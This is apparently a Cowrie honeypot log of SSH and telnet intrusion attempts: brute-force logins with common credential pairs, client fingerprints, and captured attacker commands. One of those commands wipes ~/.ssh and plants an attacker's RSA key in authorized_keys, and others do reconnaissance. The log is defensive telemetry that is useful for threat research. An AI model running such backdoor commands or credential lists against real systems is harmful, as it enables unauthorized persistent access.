{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:20:33.702507Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:20:33.703401Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:33.962565Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":36082,"dst_ip":"1.2.3.4","dst_port":23,"session":"f666ee3695f4","protocol":"telnet","message":"New connection: 3.130.96.91:36082 (1.2.3.4:23) [session: f666ee3695f4]","sensor":"my-vps","timestamp":"2025-08-31T06:20:34.472818Z"}
{"eventid":"cowrie.session.closed","duration":0.0015304088592529297,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:34.474272Z","src_ip":"3.130.96.91","session":"f666ee3695f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:20:34.537031Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:20:34.537481Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:20:34.798155Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:34.799031Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34314,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e4f39bedbe0","protocol":"ssh","message":"New connection: 212.227.235.229:34314 (1.2.3.4:22) [session: 1e4f39bedbe0]","sensor":"my-vps","timestamp":"2025-08-31T06:20:35.053208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:20:35.054170Z","src_ip":"212.227.235.229","session":"1e4f39bedbe0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:20:35.313035Z","src_ip":"212.227.235.229","session":"1e4f39bedbe0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:20:36.380864Z","src_ip":"212.227.235.229","session":"1e4f39bedbe0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:37.641502Z","src_ip":"212.227.235.229","session":"1e4f39bedbe0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35422,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6c1c1cfb612","protocol":"ssh","message":"New connection: 212.227.235.229:35422 (1.2.3.4:22) [session: e6c1c1cfb612]","sensor":"my-vps","timestamp":"2025-08-31T06:20:37.895189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:20:37.896204Z","src_ip":"212.227.235.229","session":"e6c1c1cfb612"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:20:38.153071Z","src_ip":"212.227.235.229","session":"e6c1c1cfb612"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:20:39.219275Z","src_ip":"212.227.235.229","session":"e6c1c1cfb612"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:39.477333Z","src_ip":"212.227.235.229","session":"e6c1c1cfb612"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:39.478302Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55056,"dst_ip":"1.2.3.4","dst_port":22,"session":"6048a96880de","protocol":"ssh","message":"New connection: 212.227.235.229:55056 (1.2.3.4:22) [session: 6048a96880de]","sensor":"my-vps","timestamp":"2025-08-31T06:20:42.710769Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:20:42.862279Z","src_ip":"212.227.235.229","session":"c774bbc6ed97"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:20:42.863089Z","src_ip":"212.227.235.229","session":"c774bbc6ed97"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:20:43.415050Z","src_ip":"212.227.235.229","session":"6048a96880de"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:20:43.415828Z","src_ip":"212.227.235.229","session":"6048a96880de"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-31T06:20:45.027775Z","src_ip":"212.227.125.160","session":"cbab7d5a6554"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:20:49.240360Z","src_ip":"212.227.235.229","session":"6048a96880de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":18978,"dst_ip":"1.2.3.4","dst_port":22,"session":"26cf46f15501","protocol":"ssh","message":"New connection: 212.227.235.229:18978 (1.2.3.4:22) [session: 26cf46f15501]","sensor":"my-vps","timestamp":"2025-08-31T06:20:49.771251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:20:49.773233Z","src_ip":"212.227.235.229","session":"26cf46f15501"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:20:50.004549Z","src_ip":"212.227.235.229","session":"26cf46f15501"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:50.044476Z","src_ip":"212.227.235.229","session":"65ca07191d1c"}
{"eventid":"cowrie.login.failed","username":"marvin","password":"marvin","message":"login attempt [marvin/marvin] failed","sensor":"my-vps","timestamp":"2025-08-31T06:20:50.931913Z","src_ip":"212.227.235.229","session":"26cf46f15501"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:51.388358Z","src_ip":"212.227.235.229","session":"6048a96880de"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:52.167612Z","src_ip":"212.227.235.229","session":"26cf46f15501"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"18.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 18.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:01.126498Z","src_ip":"212.227.235.229","session":"c774bbc6ed97"}
{"eventid":"cowrie.session.closed","duration":"137.1","message":"Connection lost after 137.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:01.127715Z","src_ip":"212.227.235.229","session":"c774bbc6ed97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44940,"dst_ip":"1.2.3.4","dst_port":22,"session":"820f8d408568","protocol":"ssh","message":"New connection: 212.227.125.160:44940 (1.2.3.4:22) [session: 820f8d408568]","sensor":"my-vps","timestamp":"2025-08-31T06:21:03.610262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:21:04.189790Z","src_ip":"212.227.125.160","session":"820f8d408568"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:21:04.191159Z","src_ip":"212.227.125.160","session":"820f8d408568"}
{"eventid":"cowrie.session.closed","duration":"101.5","message":"Connection lost after 101.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:04.636106Z","src_ip":"212.227.125.160","session":"cbab7d5a6554"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:21:05.824030Z","src_ip":"212.227.125.160","session":"820f8d408568"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:07.131601Z","src_ip":"212.227.125.160","session":"820f8d408568"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57392,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef789de1b6d7","protocol":"ssh","message":"New connection: 212.227.235.229:57392 (1.2.3.4:22) [session: ef789de1b6d7]","sensor":"my-vps","timestamp":"2025-08-31T06:21:14.031209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:21:14.031918Z","src_ip":"212.227.235.229","session":"ef789de1b6d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:21:14.327545Z","src_ip":"212.227.235.229","session":"ef789de1b6d7"}
{"eventid":"cowrie.login.failed","username":"debian","password":"1","message":"login attempt [debian/1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:21:15.551131Z","src_ip":"212.227.235.229","session":"ef789de1b6d7"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:16.850027Z","src_ip":"212.227.235.229","session":"ef789de1b6d7"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-31T06:21:22.037596Z","src_ip":"212.227.235.229","session":"09803d92e6c8"}
{"eventid":"cowrie.session.connect","src_ip":"3.130.96.91","src_port":44084,"dst_ip":"1.2.3.4","dst_port":23,"session":"cb29292ec94c","protocol":"telnet","message":"New connection: 3.130.96.91:44084 (1.2.3.4:23) [session: cb29292ec94c]","sensor":"my-vps","timestamp":"2025-08-31T06:21:33.635659Z"}
{"eventid":"cowrie.session.closed","duration":"81.1","message":"Connection lost after 81.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:34.083372Z","src_ip":"212.227.235.229","session":"09803d92e6c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39550,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d893ca15d17","protocol":"ssh","message":"New connection: 212.227.125.160:39550 (1.2.3.4:22) [session: 9d893ca15d17]","sensor":"my-vps","timestamp":"2025-08-31T06:21:35.039707Z"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.103.1","src_port":57782,"dst_ip":"1.2.3.4","dst_port":23,"session":"78d635ab214f","protocol":"telnet","message":"New connection: 146.190.103.1:57782 (1.2.3.4:23) [session: 78d635ab214f]","sensor":"my-vps","timestamp":"2025-08-31T06:21:39.399916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:21:40.008739Z","src_ip":"212.227.125.160","session":"9d893ca15d17"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:21:40.082942Z","src_ip":"212.227.125.160","session":"9d893ca15d17"}
{"eventid":"cowrie.session.closed","duration":1.3175075054168701,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:40.717353Z","src_ip":"146.190.103.1","session":"78d635ab214f"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.103.1","src_port":58276,"dst_ip":"1.2.3.4","dst_port":23,"session":"de3eb21dd1ba","protocol":"telnet","message":"New connection: 146.190.103.1:58276 (1.2.3.4:23) [session: de3eb21dd1ba]","sensor":"my-vps","timestamp":"2025-08-31T06:21:40.895926Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33316,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7f5346bd0e5","protocol":"ssh","message":"New connection: 212.227.235.229:33316 (1.2.3.4:22) [session: c7f5346bd0e5]","sensor":"my-vps","timestamp":"2025-08-31T06:21:41.352889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:21:42.098252Z","src_ip":"212.227.235.229","session":"c7f5346bd0e5"}
